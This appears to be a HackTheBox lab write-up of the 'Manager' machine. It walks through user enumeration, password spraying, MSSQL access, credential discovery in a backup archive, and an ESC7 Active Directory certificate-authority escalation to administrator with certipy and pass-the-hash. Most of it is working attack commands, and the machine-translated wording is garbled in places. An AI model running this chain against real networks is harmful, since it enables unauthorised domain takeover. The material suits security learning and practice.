HTB Manager. We carry out an attack on the certificate authority in Active Directory
Greetings, dear readers, AP Security is here. Today we will go through a Windows machine Manager on HackTheBox.
Scanning and reconnaissance
To detect active services, let’s scan the machine using Nmap:
nmap -sC -sV -p- -T4 10.10.11.236
Let’s try to identify active users using CrackMapExecusing the option--rid-brute:
crackmapexec smb 10.10.11.236 -u anonymous -p ' ' --rid-brute
As a result, we obtain a list of users that can be used to further develop the attack vector. We will save the list in a separate file, convert it to lower case and try to guess passwords for various services. Fortunately, we will succeed, because CrackMapExec supports work with a large number of Microsoft protocols.
crackmapexec smb 10.10.11.236 -u users.txt -p users.txtcrackmapexec mssql 10.10.11.236 -u users.txt -p users.txtWe find that the user operator The password matches the username for the MsSQL service:
Point of entry
Having credentials for mssql, we can use the module mssqlclient from the utility Impacket to connect to the database:
impacket-mssqlclient manager.htb/operator:operator@10.10.11.236
-windows-auth
So, we have successfully gained remote access to the database! Let’s try the following command to view the root folder:
exec xp_dirtree 'C:\inetpub\wwroot',1,1;Do the procedure xp_dirtree three parameters:
directory – path to get a list of folders and files
depth – how many levels of subfolders should be scanned (default 0 – all subfolders)
file – in addition to the list of folders, return a list of files (default 0 – display only folders)
This command displays a list of folders and files in the specified path.
You can learn more about the MsSQL penetration testing methodology at HackTricks.
Hmm, interesting archive with the name website-backup. Let’s pump it out using wget:
wget 10.10.11.236/website-backup-27-07-23-old.zip
Let’s unpack the archive and find the file there .old-conf.xml. Let’s look through its contents to see if there is any information of interest to us:
Great, we have received the user’s credentials raven. Let’s try the steps to connect to the machine using the utility Evil-WinRM:
evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'
Here in the directory C:\Users\Raven\Desktop there will be a file with a flag user.txt
Privilege escalation
Let’s look at information about the user using the command whoami \all
The user is a member of a group BUILTIN\Certificate Service . Let’s use the utility certipy-ad to search for vulnerabilities in the certificate service:
certipy-ad find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
-dc-ip 10.10.11.236
Let’s look through the saved file to detect vulnerabilities:
Certificate service is vulnerable to attack ESC7. In this Active Directory service, there is a template that by default is vulnerable to ESC1— SubCAbut only users belonging to the group can release it Domain Admins.
ESC7 This is possible because requests that fail are saved and can be requested again. Users with rights Manage CA And Manage Certificates to a certificate authority, can override failed certificate issuance requests and issue SubCA for any user.
First of all, we synchronize our time with the domain controller:
sudo rdate -n 10.10.11.236
In order to re-execute failed requests, as I indicated above, we need to have the rights Manage CA And Manage Certificates. We can give ourselves this right by adding our user as a new employee:
certipy ca -ca 'manager-DC01-CA' -add-officer raven
-username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
-dc-ip 10.10.11.236
Sample SubCA can be enabled on the certificate authority using the parameter-enable-template:
certipy ca -ca 'manager-DC01-CA' -username raven@manager.htb
-password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
-enable-template 'SubCA'Next we activate it ourselves SubCA:
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236
-template SubCA -upn administrator@manager.htb
Request a certificate based on a template SubCA. The request will be rejected, but we will keep the private key and record the request ID:
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn administrator@manager.htb
Using the Manage CA and Manage Certificates commands, we can issue a request for a failed certificate using the command ca and parameter-issue-request:
certipy-ad ca -ca 'manager-DC01-CA' -issue-request 18 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Having saved the certificate, we will issue it to the user administrator:
certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 - retrieve 18
Having received the certificate, we will authenticate and request a new password hash for our user:
certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
Having received the password hash, connect to the machine using the utility PsExec:
impacket-psexec manager.htb/administrator@manager.htb -hashes aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef -dc-ip 10.10.11.236
The car has passed!
